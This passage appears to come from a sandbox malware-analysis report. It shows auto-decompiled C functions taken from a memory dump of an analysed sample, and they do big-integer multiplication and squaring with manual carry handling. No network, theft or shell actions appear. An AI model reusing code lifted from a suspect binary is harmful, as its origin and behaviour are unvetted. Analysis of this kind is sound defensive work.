    				 *(_t633 - 0x10) =  *(_t331 + 0x12) & 0x0000ffff;
    				_t383 =  *(_t331 + 0x16) & 0x0000ffff;
    				_t605 = _t604 * _t541;
    				 *(_t633 - 0x14) = _t541;
    				_t384 = _t383 *  *(_t633 - 0x10);
    				_t543 = _t383 *  *(_t633 - 0x14);
    				_t460 = _t604 *  *(_t633 - 0x10) + _t543;
    				if(_t460 < _t543) {
    					_t384 = _t384 + 0x10000;
    				}
    				_t461 = _t460 << 0x10;
    				_t606 = _t605 + _t461;
    				_t385 = _t384 + (_t460 >> 0x10);
    				if(_t606 < _t461) {
    					_t385 = _t385 + 1;
    				}
    				 *(_t633 - 8) =  *(_t633 - 8) + _t606;
    				_t462 = _t385;
    				if( *(_t633 - 8) < _t606) {
    					_t462 = _t385 + 1;
    				}
    				_t345 =  *(_t633 - 4) + _t462;
    				if(_t345 < _t462) {
    					 *(_t633 - 0xc) =  *(_t633 - 0xc) + 1;
    				}
    				_t464 =  *(_t633 - 8) + _t606;
    				if(_t464 < _t606) {
    					_t385 = _t385 + 1;
    				}
    				_t346 = _t345 + _t385;
    				if(_t346 < _t385) {
    					 *(_t633 - 0xc) =  *(_t633 - 0xc) + 1;
    				}
    				 *(_t633 - 8) =  *(_t633 - 8) & 0x00000000;
    				 *((intOrPtr*)( *(_t633 + 8) + 0x24)) = _t464;
    				_t465 =  *(_t331 + 0x14);
    				_t387 = _t465 & 0x0000ffff;
    				_t466 = _t465 >> 0x10;
    				_t608 = _t387 * _t466;
    				_t609 = _t608 << 0x11;
    				_t389 = _t387 * _t387 + _t609;
    				_t468 = _t466 * _t466 + (_t608 >> 0xf);
    				if(_t389 < _t609) {
    					_t468 = _t468 + 1;
    				}
    				_t347 = _t346 + _t389;
    				if(_t347 < _t389) {
    					_t468 = _t468 + 1;
    				}
    				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t468;
    				if( *(_t633 - 0xc) < _t468) {
    					 *(_t633 - 8) = 1;
    				}
    				_t548 =  *(_t331 + 0x10) & 0x0000ffff;
    				_t610 =  *(_t331 + 0x18) & 0x0000ffff;
    				 *(_t633 - 0x10) =  *(_t331 + 0x12) & 0x0000ffff;
    				_t391 =  *(_t331 + 0x1a) & 0x0000ffff;
    				_t611 = _t610 * _t548;
    				 *(_t633 - 0x14) = _t548;
    				_t392 = _t391 *  *(_t633 - 0x10);
    				_t550 = _t391 *  *(_t633 - 0x14);
    				_t471 = _t610 *  *(_t633 - 0x10) + _t550;
    				if(_t471 < _t550) {
    					_t392 = _t392 + 0x10000;
    				}
    				_t472 = _t471 << 0x10;
    				_t612 = _t611 + _t472;
    				_t393 = _t392 + (_t471 >> 0x10);
    				if(_t612 < _t472) {
    					_t393 = _t393 + 1;
    				}
    				_t348 = _t347 + _t612;
    				_t473 = _t393;
    				 *(_t633 - 4) = _t348;
    				if(_t348 < _t612) {
    					_t473 = _t393 + 1;
    				}
    				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t473;
    				if( *(_t633 - 0xc) < _t473) {
    					 *(_t633 - 8) =  *(_t633 - 8) + 1;
    				}
    				 *(_t633 - 4) =  *(_t633 - 4) + _t612;
    				if( *(_t633 - 4) < _t612) {
    					_t393 = _t393 + 1;
    				}
    				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t393;
    				if( *(_t633 - 0xc) < _t393) {
    					 *(_t633 - 8) =  *(_t633 - 8) + 1;
    				}
    				_t553 =  *(_t331 + 0xc) & 0x0000ffff;
    				_t613 =  *(_t331 + 0x1c) & 0x0000ffff;
    				 *(_t633 - 0x10) =  *(_t331 + 0xe) & 0x0000ffff;
    				_t395 =  *(_t331 + 0x1e) & 0x0000ffff;
    				_t614 = _t613 * _t553;
    				 *(_t633 - 0x14) = _t553;
    				_t396 = _t395 *  *(_t633 - 0x10);
    				_t555 = _t395 *  *(_t633 - 0x14);
    				_t476 = _t613 *  *(_t633 - 0x10) + _t555;
    				if(_t476 < _t555) {
    					_t396 = _t396 + 0x10000;
    				}
    				_t477 = _t476 << 0x10;
    				_t615 = _t614 + _t477;
    				_t397 = _t396 + (_t476 >> 0x10);
    				if(_t615 < _t477) {
    					_t397 = _t397 + 1;
    				}
    				 *(_t633 - 4) =  *(_t633 - 4) + _t615;
    				_t478 = _t397;
    				if( *(_t633 - 4) < _t615) {
    					_t478 = _t397 + 1;
    				}
    				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t478;
    				if( *(_t633 - 0xc) < _t478) {
    					 *(_t633 - 8) =  *(_t633 - 8) + 1;
    				}
    				_t480 =  *(_t633 - 4) + _t615;
    				if(_t480 < _t615) {
    					_t397 = _t397 + 1;
    				}
    				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t397;
    				if( *(_t633 - 0xc) < _t397) {
    					 *(_t633 - 8) =  *(_t633 - 8) + 1;
    				}
    				 *(_t633 - 4) =  *(_t633 - 4) & 0x00000000;
    				 *((intOrPtr*)( *(_t633 + 8) + 0x28)) = _t480;
    				_t558 =  *(_t331 + 0x10) & 0x0000ffff;
    				_t616 =  *(_t331 + 0x1c) & 0x0000ffff;
    				 *(_t633 - 0x10) =  *(_t331 + 0x12) & 0x0000ffff;
    				_t400 =  *(_t331 + 0x1e) & 0x0000ffff;
    				_t617 = _t616 * _t558;
    				 *(_t633 - 0x14) = _t558;
    				_t401 = _t400 *  *(_t633 - 0x10);
    				_t560 = _t400 *  *(_t633 - 0x14);
    				_t483 = _t616 *  *(_t633 - 0x10) + _t560;
    				if(_t483 < _t560) {
    					_t401 = _t401 + 0x10000;
    				}
    				_t484 = _t483 << 0x10;
    				_t618 = _t617 + _t484;
    				_t402 = _t401 + (_t483 >> 0x10);
    				if(_t618 < _t484) {
    					_t402 = _t402 + 1;
    				}
    				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t618;
    				_t485 = _t402;
    				if( *(_t633 - 0xc) < _t618) {
    					_t485 = _t402 + 1;
    				}
    				 *(_t633 - 8) =  *(_t633 - 8) + _t485;
    				if( *(_t633 - 8) < _t485) {
    					 *(_t633 - 4) = 1;
    				}
    				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t618;
    				if( *(_t633 - 0xc) < _t618) {
    					_t402 = _t402 + 1;
    				}
    				 *(_t633 - 8) =  *(_t633 - 8) + _t402;
    				if( *(_t633 - 8) < _t402) {
    					 *(_t633 - 4) =  *(_t633 - 4) + 1;
    				}
    				_t563 =  *(_t331 + 0x14) & 0x0000ffff;
    				_t619 =  *(_t331 + 0x18) & 0x0000ffff;
    				 *(_t633 - 0x10) =  *(_t331 + 0x16) & 0x0000ffff;
    				_t404 =  *(_t331 + 0x1a) & 0x0000ffff;
    				_t620 = _t619 * _t563;
    				 *(_t633 - 0x14) = _t563;
    				_t405 = _t404 *  *(_t633 - 0x10);
    				_t565 = _t404 *  *(_t633 - 0x14);
    				_t488 = _t619 *  *(_t633 - 0x10) + _t565;
    				if(_t488 < _t565) {
    					_t405 = _t405 + 0x10000;
    				}
    				_t489 = _t488 << 0x10;
    				_t621 = _t620 + _t489;
    				_t406 = _t405 + (_t488 >> 0x10);
    				if(_t621 < _t489) {
    					_t406 = _t406 + 1;
    				}
    				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t621;
    				_t490 = _t406;
    				if( *(_t633 - 0xc) < _t621) {
    					_t490 = _t406 + 1;
    				}
    				_t350 =  *(_t633 - 8) + _t490;
    				if(_t350 < _t490) {
    					 *(_t633 - 4) =  *(_t633 - 4) + 1;
    				}
    				_t492 =  *(_t633 - 0xc) + _t621;
    				if(_t492 < _t621) {
    					_t406 = _t406 + 1;
    				}
    				_t351 = _t350 + _t406;
    				if(_t351 < _t406) {
    					 *(_t633 - 4) =  *(_t633 - 4) + 1;
    				}
    				 *(_t633 - 0xc) =  *(_t633 - 0xc) & 0x00000000;
    				 *((intOrPtr*)( *(_t633 + 8) + 0x2c)) = _t492;
    				_t493 =  *(_t331 + 0x18);
    				_t408 = _t493 & 0x0000ffff;
    				_t494 = _t493 >> 0x10;
    				_t623 = _t408 * _t494;
    				_t624 = _t623 << 0x11;
    				_t410 = _t408 * _t408 + _t624;
    				_t496 = _t494 * _t494 + (_t623 >> 0xf);
    				if(_t410 < _t624) {
    					_t496 = _t496 + 1;
    				}
    				_t352 = _t351 + _t410;
    				if(_t352 < _t410) {
    					_t496 = _t496 + 1;
    				}
    				 *(_t633 - 4) =  *(_t633 - 4) + _t496;
    				if( *(_t633 - 4) < _t496) {
    					 *(_t633 - 0xc) = 1;
    				}
    				_t570 =  *(_t331 + 0x14) & 0x0000ffff;
    				_t625 =  *(_t331 + 0x1c) & 0x0000ffff;
    				 *(_t633 - 0x10) =  *(_t331 + 0x16) & 0x0000ffff;
    				_t412 =  *(_t331 + 0x1e) & 0x0000ffff;
    				_t626 = _t625 * _t570;
    				 *(_t633 - 0x14) = _t570;
    				_t413 = _t412 *  *(_t633 - 0x10);
    				_t572 = _t412 *  *(_t633 - 0x14);
    				_t499 = _t625 *  *(_t633 - 0x10) + _t572;
    				if(_t499 < _t572) {
    					_t413 = _t413 + 0x10000;
    				}
    				_t500 = _t499 << 0x10;
    				_t627 = _t626 + _t500;
    				_t414 = _t413 + (_t499 >> 0x10);
    				if(_t627 < _t500) {
    					_t414 = _t414 + 1;
    				}
    				_t353 = _t352 + _t627;
    				_t501 = _t414;
    				 *(_t633 - 8) = _t353;
    				if(_t353 < _t627) {
    					_t501 = _t414 + 1;
    				}
    				 *(_t633 - 4) =  *(_t633 - 4) + _t501;
    				if( *(_t633 - 4) < _t501) {
    					 *(_t633 - 0xc) =  *(_t633 - 0xc) + 1;
    				}
    				_t503 =  *(_t633 - 8) + _t627;
    				if(_t503 < _t627) {
    					_t414 = _t414 + 1;
    				}
    				 *(_t633 - 4) =  *(_t633 - 4) + _t414;
    				if( *(_t633 - 4) < _t414) {
    					 *(_t633 - 0xc) =  *(_t633 - 0xc) + 1;
    				}
    				_t354 =  *(_t633 + 8);
    				 *(_t633 - 8) =  *(_t633 - 8) & 0x00000000;
    				 *((intOrPtr*)(_t354 + 0x30)) = _t503;
    				_t575 =  *(_t331 + 0x18) & 0x0000ffff;
    				_t628 =  *(_t331 + 0x1c) & 0x0000ffff;
    				 *(_t633 + 8) =  *(_t331 + 0x1a) & 0x0000ffff;
    				_t416 =  *(_t331 + 0x1e) & 0x0000ffff;
    				_t629 = _t628 * _t575;
    				 *(_t633 - 0x14) = _t575;
    				_t417 = _t416 *  *(_t633 + 8);
    				_t577 = _t416 *  *(_t633 - 0x14);
    				_t506 = _t628 *  *(_t633 + 8) + _t577;
    				if(_t506 < _t577) {
    					_t417 = _t417 + 0x10000;
    				}
    				_t507 = _t506 << 0x10;
    				_t630 = _t629 + _t507;
    				_t418 = _t417 + (_t506 >> 0x10);
    				if(_t630 < _t507) {
    					_t418 = _t418 + 1;
    				}
    				 *(_t633 - 4) =  *(_t633 - 4) + _t630;
    				 *(_t633 + 8) = _t418;
    				_t508 = _t418;
    				if( *(_t633 - 4) < _t630) {
    					_t319 = _t418 + 1; // 0x1
    					_t508 = _t319;
    				}
    				_t581 =  *(_t633 - 0xc) + _t508;
    				if(_t581 < _t508) {
    					 *(_t633 - 8) = 1;
    				}
    				_t510 =  *(_t633 - 4) + _t630;
    				_t419 = _t418 + 1;
    				if(_t419 >= 0) {
    					_t419 =  *(_t633 + 8);
    				}
    				_t582 = _t581 + _t419;
    				if(_t582 < _t419) {
    					 *(_t633 - 8) =  *(_t633 - 8) + 1;
    				}
    				 *((intOrPtr*)(_t354 + 0x34)) = _t510;
    				_t332 =  *(_t331 + 0x1c);
    				_t631 = _t332 & 0x0000ffff;
    				_t333 = _t332 >> 0x10;
    				_t512 = _t631 * _t333;
    				_t422 = _t333 * _t333 + (_t512 >> 0xf);
    				_t513 = _t512 << 0x11;
    				_t338 = _t631 * _t631 + _t513;
    				if(_t338 < _t513) {
    					_t422 = _t422 + 1;
    				}
    				_t583 = _t582 + _t338;
    				if(_t583 < _t338) {
    					_t422 = _t422 + 1;
    				}
    				 *((intOrPtr*)(_t354 + 0x38)) = _t583;
    				 *((intOrPtr*)(_t354 + 0x3c)) = _t422 +  *(_t633 - 8);
    				return _t338;
    			}

    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 100%
    			E003A8A1C(signed short* __eax, signed short* __ecx, intOrPtr* _a4) {
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				signed int _v20;
    				signed short* _t258;
    				unsigned int _t261;
    				signed int _t262;
    				intOrPtr _t263;
    				signed int _t264;
    				signed int _t268;
    				unsigned int _t271;
    				signed int _t272;
    				signed int _t273;
    				signed int _t275;
    				signed int _t277;
    				signed int _t279;
    				signed int _t281;
    				signed int _t283;
    				signed int _t285;
    				signed int _t287;
    				signed int _t289;
    				signed int _t291;
    				signed int _t293;
    				signed int _t295;
    				signed int _t297;
    				signed int _t299;
    				signed short* _t300;
    				signed int _t301;
    				signed int _t302;
    				void* _t303;
    				signed int _t306;
    				signed int _t307;
    				intOrPtr _t308;
    				signed int _t309;
    				signed int _t310;
    				void* _t311;
    				signed int _t315;
    				signed int _t316;
    				intOrPtr _t318;
    				signed int _t322;
    				signed int _t323;
    				signed int _t327;
    				signed int _t328;
    				signed int _t332;
    				signed int _t333;
    				intOrPtr _t335;
    				signed int _t339;
    				signed int _t340;
    				signed int _t344;
    				signed int _t345;
    				signed int _t349;
    				signed int _t350;
    				signed int _t354;
    				signed int _t355;
    				intOrPtr _t357;
    				signed int _t361;
    				signed int _t362;
    				signed int _t366;
    				signed int _t367;
    				signed int _t371;
    				signed int _t372;
    				intOrPtr _t374;
    				signed int _t378;
    				signed int _t379;
    				signed int _t383;
    				signed int _t384;
    				intOrPtr _t386;
    				signed int _t387;
    				signed int _t388;
    				void* _t389;
    				signed int _t390;
    				signed int _t398;
    				signed int _t402;
    				signed int _t403;
    				signed int _t404;
    				void* _t405;
    				signed int _t406;
    				signed int _t409;
    				void* _t413;
    				signed int _t414;
    				signed int _t417;
    				void* _t421;
    				signed int _t422;
    				signed int _t425;
    				void* _t429;
    				signed int _t430;
    				signed int _t433;
    				void* _t437;
    				signed int _t438;
    				signed int _t441;
    				void* _t445;
    				signed int _t446;
    				signed int _t449;
    				void* _t453;
    				signed int _t454;
    				signed int _t457;
    				void* _t461;
    				signed int _t462;
    				signed int _t465;
    				void* _t469;
    				signed int _t470;
    				signed int _t473;
    				void* _t477;
    				signed int _t478;
    				signed int _t481;
    				void* _t485;
    				signed int _t486;
    				signed int _t489;
    				void* _t493;
    				signed int _t494;
    				signed int _t497;
    				void* _t501;
    				signed int _t502;
    				unsigned int _t505;
    				signed int _t506;
    				signed int _t508;
    				signed int _t509;
    				signed int _t510;
    				signed int _t511;
    				signed int _t514;
    				void* _t518;
    				signed int _t520;
    				signed int _t522;
    				signed int _t523;
    				void* _t524;
    				signed int _t525;
    				signed int _t526;
    				void* _t527;
    				signed int _t528;
    				signed int _t529;
    				void* _t530;
    				signed int _t532;
    				signed int _t533;
    				void* _t534;
    				signed int _t535;
    				signed int _t536;
    				void* _t537;
    				signed int _t538;
    				signed int _t539;
    				void* _t540;
    				signed int _t541;
    				signed int _t542;
    				void* _t543;
    				signed int _t545;
    				signed int _t546;
    				void* _t547;
    				signed int _t548;
    				signed int _t549;
    				void* _t550;
    				signed int _t551;
    				signed int _t552;
    				void* _t553;
    				signed int _t555;
    				signed int _t556;
    				void* _t557;
    				signed int _t558;
    				signed int _t559;
    				void* _t560;
    				signed int _t563;
    				intOrPtr _t567;
    
    				_t300 = __ecx;
    				_t258 = __eax;
    				_t264 =  *__eax & 0x0000ffff;
    				_t390 = __ecx[1] & 0x0000ffff;
    				_v16 = _t390;
    				_v20 = __eax[1] & 0x0000ffff;
    				_t306 =  *__ecx & 0x0000ffff;
    				_t307 = _t306 * _t264;
    				_v12 = _t390 * _t264;
    				_t505 = _t306 * _v20 + _v12;
    				_v16 = _v16 * (__eax[1] & 0x0000ffff);
    				if(_t505 < _v12) {
    					_v16 = _v16 + 0x10000;
    				}
    				_t506 = _t505 << 0x10;
    				_v16 = _v16 + (_t505 >> 0x10);
    				_t308 = _t307 + _t506;
    				if(_t308 < _t506) {
    					_v16 = _v16 + 1;
    				}
    				 *_a4 = _t308;
    				_t309 =  *_t300 & 0x0000ffff;
    				_t508 = _t300[1] & 0x0000ffff;
    				_v8 = _v8 & 0x00000000;
    				_t268 = _t258[2] & 0x0000ffff;
    				_v20 = _t309 * (_t258[3] & 0x0000ffff);
    				_t310 = _t309 * _t268;
    				_t398 = _t508 * _t268;
    				_t509 = _t508 * (_t258[3] & 0x0000ffff);
    				_t271 = _v20 + _t398;
    				if(_t271 < _t398) {
    					_t509 = _t509 + 0x10000;
    				}
    				_t272 = _t271 << 0x10;
    				_t311 = _t310 + _t272;
    				_t510 = _t509 + (_t271 >> 0x10);
    				if(_t311 < _t272) {
    					_t510 = _t510 + 1;
    				}
    				_t402 = _v16 + _t311;
    				_v20 = _t510;
    				_v12 = _t402;
    				if(_t402 < _t311) {
    					_v20 = _t510 + 1;
    				}
    				_t273 =  *_t258 & 0x0000ffff;
    				_t511 = _t300[2] & 0x0000ffff;
    				_t403 = _t300[3] & 0x0000ffff;
    				_v16 = _t258[1] & 0x0000ffff;
    				_v16 = _t511 * _t273;
    				_t514 = _t403 * _t273;
    				_t315 = _t511 * _v16 + _t514;
    				_t404 = _t403 * (_t258[1] & 0x0000ffff);
    				if(_t315 < _t514) {
    					_t404 = _t404 + 0x10000;
    				}
    				_t405 = _t404 + (_t315 >> 0x10);
    				_t316 = _t315 << 0x10;
    				_t518 = _v16 + _t316;
    				if(_t518 < _t316) {
    					_t405 = _t405 + 1;
    				}
    				_t318 = _v12 + _t518;
    				if(_t318 < _t518) {
    					_t405 = _t405 + 1;
    				}
    				_t520 = _v20 + _t405;
    				_v16 = _t520;
    				if(_t520 < _t405) {
    					_v8 = 1;
    				}
    				 *((intOrPtr*)(_a4 + 4)) = _t318;
    				_t275 =  *_t258 & 0x0000ffff;
    				_t406 = _t300[4] & 0x0000ffff;
    				_t522 = _t300[5] & 0x0000ffff;
    				_v12 = _v12 & 0x00000000;
    				_v20 = _t258[1] & 0x0000ffff;
    				_v20 = _t406 * _t275;
    				_t409 = _t522 * _t275;
    				_t322 = _t406 * _v20 + _t409;
    				_t523 = _t522 * (_t258[1] & 0x0000ffff);
    				if(_t322 < _t409) {
    					_t523 = _t523 + 0x10000;
    				}
    				_t524 = _t523 + (_t322 >> 0x10);
    				_t323 = _t322 << 0x10;
    				_t413 = _v20 + _t323;
    				if(_t413 < _t323) {
    					_t524 = _t524 + 1;
    				}
    				_v16 = _v16 + _t413;
    				if(_v16 < _t413) {
    					_t524 = _t524 + 1;
    				}
    				_v8 = _v8 + _t524;
    				if(_v8 < _t524) {
    					_v12 = 1;
    				}
    				_t277 = _t258[2] & 0x0000ffff;
    				_t414 = _t300[2] & 0x0000ffff;
    				_t525 = _t300[3] & 0x0000ffff;
    				_v20 = _t258[3] & 0x0000ffff;
    				_v20 = _t414 * _t277;
    				_t417 = _t525 * _t277;
    				_t327 = _t414 * _v20 + _t417;
    				_t526 = _t525 * (_t258[3] & 0x0000ffff);
    				if(_t327 < _t417) {
    					_t526 = _t526 + 0x10000;
    				}
    				_t527 = _t526 + (_t327 >> 0x10);
    				_t328 = _t327 << 0x10;
    				_t421 = _v20 + _t328;
    				if(_t421 < _t328) {
    					_t527 = _t527 + 1;
    				}
    				_v16 = _v16 + _t421;
    				if(_v16 < _t421) {
    					_t527 = _t527 + 1;
    				}
    				_v8 = _v8 + _t527;
    				if(_v8 < _t527) {
    					_v12 = _v12 + 1;
    				}
    				_t279 = _t258[4] & 0x0000ffff;
    				_t422 =  *_t300 & 0x0000ffff;
    				_t528 = _t300[1] & 0x0000ffff;
    				_v20 = _t258[5] & 0x0000ffff;
    				_v20 = _t422 * _t279;
    				_t425 = _t528 * _t279;
    				_t332 = _t422 * _v20 + _t425;
    				_t529 = _t528 * (_t258[5] & 0x0000ffff);
    				if(_t332 < _t425) {
    					_t529 = _t529 + 0x10000;
    				}
    				_t530 = _t529 + (_t332 >> 0x10);
    				_t333 = _t332 << 0x10;
    				_t429 = _v20 + _t333;
    				if(_t429 < _t333) {
    					_t530 = _t530 + 1;
    				}
    				_t335 = _v16 + _t429;
    				if(_t335 < _t429) {
    					_t530 = _t530 + 1;
    				}
    				_v8 = _v8 + _t530;
    				if(_v8 < _t530) {
    					_v12 = _v12 + 1;
    				}
    				 *((intOrPtr*)(_a4 + 8)) = _t335;
    				_t281 = _t258[6] & 0x0000ffff;
    				_t430 =  *_t300 & 0x0000ffff;
    				_t532 = _t300[1] & 0x0000ffff;
    				_v16 = _v16 & 0x00000000;
    				_v20 = _t258[7] & 0x0000ffff;
    				_v20 = _t430 * _t281;
    				_t433 = _t532 * _t281;
    				_t339 = _t430 * _v20 + _t433;
    				_t533 = _t532 * (_t258[7] & 0x0000ffff);
    				if(_t339 < _t433) {
    					_t533 = _t533 + 0x10000;
    				}
    				_t534 = _t533 + (_t339 >> 0x10);
    				_t340 = _t339 << 0x10;
    				_t437 = _v20 + _t340;
    				if(_t437 < _t340) {
    					_t534 = _t534 + 1;
    				}
    				_v8 = _v8 + _t437;
    				if(_v8 < _t437) {
    					_t534 = _t534 + 1;
    				}
    				_v12 = _v12 + _t534;
    				if(_v12 < _t534) {
    					_v16 = 1;
    				}
    				_t283 = _t258[4] & 0x0000ffff;
    				_t438 = _t300[2] & 0x0000ffff;
    				_t535 = _t300[3] & 0x0000ffff;
    				_v20 = _t258[5] & 0x0000ffff;
    				_v20 = _t438 * _t283;
    				_t441 = _t535 * _t283;
    				_t344 = _t438 * _v20 + _t441;
    				_t536 = _t535 * (_t258[5] & 0x0000ffff);
    				if(_t344 < _t441) {
    					_t536 = _t536 + 0x10000;
    				}
    				_t537 = _t536 + (_t344 >> 0x10);
    				_t345 = _t344 << 0x10;
    				_t445 = _v20 + _t345;
    				if(_t445 < _t345) {
    					_t537 = _t537 + 1;
    				}
    				_v8 = _v8 + _t445;
    				if(_v8 < _t445) {
    					_t537 = _t537 + 1;
    				}
    				_v12 = _v12 + _t537;
    				if(_v12 < _t537) {
    					_v16 = _v16 + 1;
    				}
    				_t285 = _t258[2] & 0x0000ffff;
    				_t446 = _t300[4] & 0x0000ffff;
    				_t538 = _t300[5] & 0x0000ffff;
    				_v20 = _t258[3] & 0x0000ffff;
    				_v20 = _t446 * _t285;
    				_t449 = _t538 * _t285;
    				_t349 = _t446 * _v20 + _t449;
    				_t539 = _t538 * (_t258[3] & 0x0000ffff);
    				if(_t349 < _t449) {
    					_t539 = _t539 + 0x10000;
    				}
    				_t540 = _t539 + (_t349 >> 0x10);
    				_t350 = _t349 << 0x10;
    				_t453 = _v20 + _t350;
    				if(_t453 < _t350) {
    					_t540 = _t540 + 1;
    				}
    				_v8 = _v8 + _t453;
    				if(_v8 < _t453) {
    					_t540 = _t540 + 1;
    				}
    				_v12 = _v12 + _t540;
    				if(_v12 < _t540) {
    					_v16 = _v16 + 1;
    				}
    				_t287 =  *_t258 & 0x0000ffff;
    				_t454 = _t300[6] & 0x0000ffff;
    				_t541 = _t300[7] & 0x0000ffff;
    				_v20 = _t258[1] & 0x0000ffff;
    				_v20 = _t454 * _t287;
    				_t457 = _t541 * _t287;
    				_t354 = _t454 * _v20 + _t457;
    				_t542 = _t541 * (_t258[1] & 0x0000ffff);
    				if(_t354 < _t457) {
    					_t542 = _t542 + 0x10000;
    				}
    				_t543 = _t542 + (_t354 >> 0x10);
    				_t355 = _t354 << 0x10;
    				_t461 = _v20 + _t355;
    				if(_t461 < _t355) {
    					_t543 = _t543 + 1;
    				}
    				_t357 = _v8 + _t461;
    				if(_t357 < _t461) {
    					_t543 = _t543 + 1;
    				}
    				_v12 = _v12 + _t543;
    				if(_v12 < _t543) {
    					_v16 = _v16 + 1;
    				}
    				 *((intOrPtr*)(_a4 + 0xc)) = _t357;
    				_t289 = _t258[2] & 0x0000ffff;
    				_t462 = _t300[6] & 0x0000ffff;
    				_t545 = _t300[7] & 0x0000ffff;
    				_v8 = _v8 & 0x00000000;
    				_v20 = _t258[3] & 0x0000ffff;
    				_v20 = _t462 * _t289;
    				_t465 = _t545 * _t289;
    				_t361 = _t462 * _v20 + _t465;
    				_t546 = _t545 * (_t258[3] & 0x0000ffff);
    				if(_t361 < _t465) {
    					_t546 = _t546 + 0x10000;
    				}
    				_t547 = _t546 + (_t361 >> 0x10);
    				_t362 = _t361 << 0x10;
    				_t469 = _v20 + _t362;
    				if(_t469 < _t362) {
    					_t547 = _t547 + 1;
    				}
    				_v12 = _v12 + _t469;
    				if(_v12 < _t469) {
    					_t547 = _t547 + 1;
    				}
    				_v16 = _v16 + _t547;
    				if(_v16 < _t547) {
    					_v8 = 1;
    				}
    				_t291 = _t258[4] & 0x0000ffff;
    				_t470 = _t300[4] & 0x0000ffff;
    				_t548 = _t300[5] & 0x0000ffff;
    				_v20 = _t258[5] & 0x0000ffff;
    				_v20 = _t470 * _t291;
    				_t473 = _t548 * _t291;
    				_t366 = _t470 * _v20 + _t473;
    				_t549 = _t548 * (_t258[5] & 0x0000ffff);
    				if(_t366 < _t473) {
    					_t549 = _t549 + 0x10000;
    				}
    				_t550 = _t549 + (_t366 >> 0x10);
    				_t367 = _t366 << 0x10;
    				_t477 = _v20 + _t367;
    				if(_t477 < _t367) {
    					_t550 = _t550 + 1;
    				}
    				_v12 = _v12 + _t477;
    				if(_v12 < _t477) {
    					_t550 = _t550 + 1;
    				}
    				_v16 = _v16 + _t550;
    				if(_v16 < _t550) {
    					_v8 = _v8 + 1;
    				}
    				_t293 = _t258[6] & 0x0000ffff;
    				_t478 = _t300[2] & 0x0000ffff;
    				_t551 = _t300[3] & 0x0000ffff;
    				_v20 = _t258[7] & 0x0000ffff;
    				_v20 = _t478 * _t293;
    				_t481 = _t551 * _t293;
    				_t371 = _t478 * _v20 + _t481;
    				_t552 = _t551 * (_t258[7] & 0x0000ffff);
    				if(_t371 < _t481) {
    					_t552 = _t552 + 0x10000;
    				}
    				_t553 = _t552 + (_t371 >> 0x10);
    				_t372 = _t371 << 0x10;
    				_t485 = _v20 + _t372;
    				if(_t485 < _t372) {
    					_t553 = _t553 + 1;
    				}
    				_t374 = _v12 + _t485;
    				if(_t374 < _t485) {
    					_t553 = _t553 + 1;
    				}
    				_v16 = _v16 + _t553;
    				if(_v16 < _t553) {
    					_v8 = _v8 + 1;
    				}
    				 *((intOrPtr*)(_a4 + 0x10)) = _t374;
    				_t295 = _t258[6] & 0x0000ffff;
    				_t486 = _t300[4] & 0x0000ffff;
    				_t555 = _t300[5] & 0x0000ffff;
    				_v12 = _v12 & 0x00000000;
    				_v20 = _t258[7] & 0x0000ffff;
    				_v20 = _t486 * _t295;
    				_t489 = _t555 * _t295;
    				_t378 = _t486 * _v20 + _t489;
    				_t556 = _t555 * (_t258[7] & 0x0000ffff);
    				if(_t378 < _t489) {
    					_t556 = _t556 + 0x10000;
    				}
    				_t557 = _t556 + (_t378 >> 0x10);
    				_t379 = _t378 << 0x10;
    				_t493 = _v20 + _t379;
    				if(_t493 < _t379) {
    					_t557 = _t557 + 1;
    				}
    				_v16 = _v16 + _t493;
    				if(_v16 < _t493) {
    					_t557 = _t557 + 1;
    				}
    				_v8 = _v8 + _t557;
    				if(_v8 < _t557) {
    					_v12 = 1;
    				}
    				_t297 = _t258[4] & 0x0000ffff;
    				_t494 = _t300[6] & 0x0000ffff;
    				_t558 = _t300[7] & 0x0000ffff;
    				_v20 = _t258[5] & 0x0000ffff;
    				_v20 = _t494 * _t297;
    				_t497 = _t558 * _t297;
    				_t383 = _t494 * _v20 + _t497;
    				_t559 = _t558 * (_t258[5] & 0x0000ffff);
    				if(_t383 < _t497) {
    					_t559 = _t559 + 0x10000;
    				}
    				_t560 = _t559 + (_t383 >> 0x10);
    				_t384 = _t383 << 0x10;
    				_t501 = _v20 + _t384;
    				if(_t501 < _t384) {
    					_t560 = _t560 + 1;
    				}
    				_t386 = _v16 + _t501;
    				if(_t386 < _t501) {
    					_t560 = _t560 + 1;
    				}
    				_v8 = _v8 + _t560;
    				if(_v8 < _t560) {
    					_v12 = _v12 + 1;
    				}
    				 *((intOrPtr*)(_a4 + 0x14)) = _t386;
    				_t387 = _t300[6] & 0x0000ffff;
    				_t502 = _t258[6] & 0x0000ffff;
    				_t299 = _t258[7] & 0x0000ffff;
    				_t301 = _t300[7] & 0x0000ffff;
    				_t388 = _t387 * _t502;
    				_t302 = _t301 * _t299;
    				_t563 = _t301 * _t502;
    				_t261 = _t387 * _t299 + _t563;
    				if(_t261 < _t563) {
    					_t302 = _t302 + 0x10000;
    				}
    				_t262 = _t261 << 0x10;
    				_t389 = _t388 + _t262;
    				_t303 = _t302 + (_t261 >> 0x10);
    				if(_t389 < _t262) {
    					_t303 = _t303 + 1;
    				}
    				_t567 = _v8 + _t389;
    				if(_t567 < _t389) {
    					_t303 = _t303 + 1;
    				}
    				_t263 = _a4;
    				 *((intOrPtr*)(_t263 + 0x18)) = _t567;
    				 *((intOrPtr*)(_t263 + 0x1c)) = _t303 + _v12;
    				return _t263;
    			}

    Memory Dump Source
